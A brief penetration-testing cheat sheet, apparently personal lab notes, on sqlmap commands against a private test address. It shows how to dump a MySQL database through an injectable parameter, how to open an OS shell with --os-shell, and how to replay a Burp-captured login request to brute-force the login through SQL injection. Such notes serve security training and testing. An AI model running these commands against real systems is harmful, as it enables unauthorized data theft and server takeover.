sqlmap
Automate database dump:
#
sqlmap -u
http://10.10.10.10/debug.php?id=1
-p “id” --dbms=mysql --dump
--dbms is the backend database type
--dump to dump all.
execute a shell:
#
sqlmap -u
http://10.10.10.10./debug.php?id=1
-p “id” --dbms=mysql --os-shell
Login Portal, SQL Brute Force:
If you have a login prompt that you suspect may be injectable; then setup burp to capture the traffic. Next try to authenticate withadmin:admin
and capture it with burp. Copy the raw request into a file login.req. You may have to clean up the spacing of the request after the c&p. Then hand it to sql map:
#
sqlmap -r login.req
//this will auto brute sqli to attempt a login.
More coming soon!
Last updated